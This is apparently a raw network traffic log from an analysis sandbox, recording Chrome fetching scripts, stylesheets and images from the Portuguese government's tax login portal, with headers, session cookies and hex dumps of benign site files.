                                                                                                                  2024-11-14 13:59:52 UTC3511INData Raw: 40 6d 65 64 69 61 20 70 72 69 6e 74 20 7b 0d 0a 20 20 20 20 2e 6d 61 69 6e 2d 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a 2e 6d 61 69 6e 2d 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 62 64 65 65 30 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 20 23 64 62 64 65 65 30 20 30 25 2c 20 23 63 64 64 31 64 33 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 20 6c 65 66 74 20 74 6f 70 2c 20 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 20 63 6f 6c 6f 72 2d 73
                                                                                                                  Data Ascii: @media print { .main-footer { display: none; }}.main-footer { background: #dbdee0; background: -moz-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%); background: -webkit-gradient(linear, left top, left bottom, color-s


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.449744152.199.21.1754437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:53 UTC567OUTGET /app/pfstatic_static/js/pf-footer.js HTTP/1.1
                                                                                                                  Host: static.portaldasfinancas.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-11-14 13:59:53 UTC439INHTTP/1.1 200 OK
                                                                                                                  Age: 25
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:53 GMT
                                                                                                                  Expires: Thu, 14 Nov 2024 14:00:23 GMT
                                                                                                                  Last-Modified: Mon, 11 Nov 2024 18:18:44 GMT
                                                                                                                  Server: ECAcc (lhc/792D)
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Length: 1525
                                                                                                                  Connection: close
                                                                                                                  2024-11-14 13:59:53 UTC1525INData Raw: 77 69 6e 64 6f 77 2e 50 46 7c 7c 28 50 46 3d 7b 7d 29 2c 77 69 6e 64 6f 77 2e 50 46 2e 63 6f 6d 6d 6f 6e 7c 7c 28 50 46 2e 63 6f 6d 6d 6f 6e 3d 7b 66 6f 6f 74 65 72 3a 27 3c 62 3e 44 61 64 6f 73 20 50 65 73 73 6f 61 69 73 3c 2f 62 3e 3c 62 72 20 2f 3e 41 20 41 75 74 6f 72 69 64 61 64 65 20 54 72 69 62 75 74 26 61 61 63 75 74 65 3b 72 69 61 20 65 20 41 64 75 61 6e 65 69 72 61 20 28 41 54 29 20 74 72 61 74 61 20 64 61 64 6f 73 20 70 65 73 73 6f 61 69 73 20 6e 6f 20 26 61 63 69 72 63 3b 6d 62 69 74 6f 20 64 61 73 20 73 75 61 73 20 61 74 72 69 62 75 69 26 63 63 65 64 69 6c 3b 26 6f 74 69 6c 64 65 3b 65 73 2c 20 64 65 73 69 67 6e 61 64 61 6d 65 6e 74 65 20 61 73 20 63 6f 6e 73 74 61 6e 74 65 73 20 64 6f 20 61 72 74 69 67 6f 20 32 2e 26 6f 72 64 6d 3b 2c 20 6e
                                                                                                                  Data Ascii: window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.44974662.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:53 UTC1128OUTGET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:53 UTC370INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:53 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 5418
                                                                                                                  2024-11-14 13:59:53 UTC5418INData Raw: 2f 2a 20 4d 6f 64 65 72 6e 69 7a 72 20 32 2e 38 2e 33 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 26 20 42 53 44 0d 0a 20 2a 20 42 75 69 6c 64 3a 20 68 74 74 70 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 23 2d 73 68 69 76 2d 61 64 64 74 65 73 74 2d 70 72 65 66 69 78 65 64 2d 74 65 73 74 73 74 79 6c 65 73 2d 74 65 73 74 70 72 6f 70 2d 74 65 73 74 61 6c 6c 70 72 6f 70 73 2d 68 61 73 65 76 65 6e 74 2d 70 72 65 66 69 78 65 73 2d 64 6f 6d 70 72 65 66 69 78 65 73 0d 0a 20 2a 2f 0d 0a 3b 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 7a 28 61 29 7b 69 2e 63 73 73 54 65 78 74 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29
                                                                                                                  Data Ascii: /* Modernizr 2.8.3 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes */;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b)


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.44974762.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:53 UTC1132OUTGET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:54 UTC401INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=38
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:53 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 3496
                                                                                                                  2024-11-14 13:59:54 UTC3496INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 0d 0a 20 20 20 20 2f 2a 2a 0d 0a 20 20 20 20 20 2a 20 50 72 65 65 6e 63 68 65 72 20 66 6f 6f 74 65 72 20 63 6f 6d 20 61 20 69 6e 66 6f 20 64 6f 20 52 47 50 44 0d 0a 20 20 20 20 20 2a 2f 0d 0a 0d 0a 20 20 20 20 76 61 72 20 66 6f 6f 74 65 72 45 6c 65 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 66 6f 6f 74 65 72 2d 72 67 70 64 2d 63 6f 6e 74 65 6e 74 22 29 3b 0d 0a 0d 0a 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 50 46 20 26 26 20 77 69 6e 64 6f 77 2e 50 46 2e 63 6f 6d 6d 6f 6e 20 26 26 20 77 69 6e 64 6f 77 2e 50 46 2e 63 6f 6d 6d 6f 6e 2e 66 6f 6f 74 65 72 29 20 7b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 45 6c
                                                                                                                  Data Ascii: window.onload = function() { /** * Preencher footer com a info do RGPD */ var footerElem = document.getElementById("footer-rgpd-content"); if (window.PF && window.PF.common && window.PF.common.footer) { footerEl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.44974862.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:54 UTC1186OUTGET /autentica_static/img/autenticacaogov.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:54 UTC372INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=65
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:54 GMT
                                                                                                                  Age: 299
                                                                                                                  Content-Length: 10264
                                                                                                                  2024-11-14 13:59:54 UTC10264INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 a6 08 06 00 00 00 6a 67 a3 99 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 27 ad 49 44 41 54 78 5e ed 9d 8b 7b 15 d5 b9 c6 cf df 77 8a 56 db 6a 3d 6d ad 6d ed cd b6 a7 b5 c7 d6 73 4e 6f f6 b4 b6 b4 20 17 51 50 50 54 ea a5 55 e4 a2 02 22 5e 42 80 00 21 40 48 20 21 5c 43 12 08 04 92 90 0b b9 90 8b eb ec 77 33 0b 57 26 df 9a 59 33 7b 66 f6 ec 3d ef ef 79 de 47 1f f6 ac 35 93 d9 b3 67 de f9 d6 b7 be f5 6f 8a 10 42 08 21 84 e4 12 1a 35 42 08 21 84 90 9c 42 a3 46 08 21 84 10 92 53 68 d4 08 21 84 10 42 72 0a 8d 1a 21 84 10 42 48 4e 89 6d d4 66 e6 e6 d5 c8 c4 6d 35 34 3e 4d 51 89 69 6c
                                                                                                                  Data Ascii: PNGIHDRjjgsRGBgAMAapHYsod'IDATx^{wVj=mmsNo QPPTU"^B!@H !\Cw3W&Y3{f=yG5goB!5B!BF!Sh!Br!BHNmfm54>MQil


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.44974962.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:54 UTC1186OUTGET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:54 UTC574INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:54 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 622
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: image/png
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Set-Cookie: TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754; Secure; Path=/
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-11-14 13:59:54 UTC622INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0b 11 00 00 0b 11 01 7f 64 5f 91 00 00 00 07 74 49 4d 45 07 df 03 04 0e 03 23 64 aa e6 66 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 30 2e 39 6c 33 7e 4e 00 00 01 d9 49 44 41 54 38 4f cd 94 db 4b db 70 14 c7 f3 36 ff 1c 9f f7 b2 d7 31 d2 76 13 91 21 0e 2f 74 8e 81 43 70 db d3 50 1f b6 87 26 56 ad 4e bc 80 53 56 1f d4 87 b5 3a 98 43 31 49 3b 6c a1 56 5b ef 58 54 8a 60 f1 82 f5 32 2f 4d da a4 5f f3 fb 75 65 e4 2d 59 f7 e0 81 2f 81 73 7e f9 e4 9c ef 49 c2 fc f7 70 f0 52 b9 cd 25 54 d9 3a 4a 14 27 b1 8f 7b 66 1e 30 36 4e 48 da 79 21 57 b2 38
                                                                                                                  Data Ascii: PNGIHDRgAMAapHYsd_tIME#dftEXtSoftwarepaint.net 4.0.9l3~NIDAT8OKp61v!/tCpP&VNSV:C1I;lV[XT`2/M_ue-Y/s~IpR%T:J'{f06NHy!W8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.449750152.199.21.1754437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:54 UTC390OUTGET /app/pfstatic_static/js/pf-footer.js HTTP/1.1
                                                                                                                  Host: static.portaldasfinancas.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-11-14 13:59:54 UTC439INHTTP/1.1 200 OK
                                                                                                                  Age: 26
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:54 GMT
                                                                                                                  Expires: Thu, 14 Nov 2024 14:00:24 GMT
                                                                                                                  Last-Modified: Mon, 11 Nov 2024 18:18:44 GMT
                                                                                                                  Server: ECAcc (lhc/792D)
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Length: 1525
                                                                                                                  Connection: close
                                                                                                                  2024-11-14 13:59:54 UTC1525INData Raw: 77 69 6e 64 6f 77 2e 50 46 7c 7c 28 50 46 3d 7b 7d 29 2c 77 69 6e 64 6f 77 2e 50 46 2e 63 6f 6d 6d 6f 6e 7c 7c 28 50 46 2e 63 6f 6d 6d 6f 6e 3d 7b 66 6f 6f 74 65 72 3a 27 3c 62 3e 44 61 64 6f 73 20 50 65 73 73 6f 61 69 73 3c 2f 62 3e 3c 62 72 20 2f 3e 41 20 41 75 74 6f 72 69 64 61 64 65 20 54 72 69 62 75 74 26 61 61 63 75 74 65 3b 72 69 61 20 65 20 41 64 75 61 6e 65 69 72 61 20 28 41 54 29 20 74 72 61 74 61 20 64 61 64 6f 73 20 70 65 73 73 6f 61 69 73 20 6e 6f 20 26 61 63 69 72 63 3b 6d 62 69 74 6f 20 64 61 73 20 73 75 61 73 20 61 74 72 69 62 75 69 26 63 63 65 64 69 6c 3b 26 6f 74 69 6c 64 65 3b 65 73 2c 20 64 65 73 69 67 6e 61 64 61 6d 65 6e 74 65 20 61 73 20 63 6f 6e 73 74 61 6e 74 65 73 20 64 6f 20 61 72 74 69 67 6f 20 32 2e 26 6f 72 64 6d 3b 2c 20 6e
                                                                                                                  Data Ascii: window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.44975262.28.254.2154437208C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 13:59:55 UTC1176OUTGET /autentica_static/img/background.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC389INHTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=80
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 300
                                                                                                                  Content-Length: 43457
                                                                                                                  2024-11-14 13:59:55 UTC15995INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 ad 00 00 02 d7 08 06 00 00 00 3e 07 1f 0d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 86 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 31 34 20 37 39 2e 31 35 36 37 39 37 2c 20 32 30 31 34 2f 30 38 2f 32 30 2d 30 39 3a 35 33 3a 30 32 20 20
                                                                                                                  Data Ascii: PNGIHDR>tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02
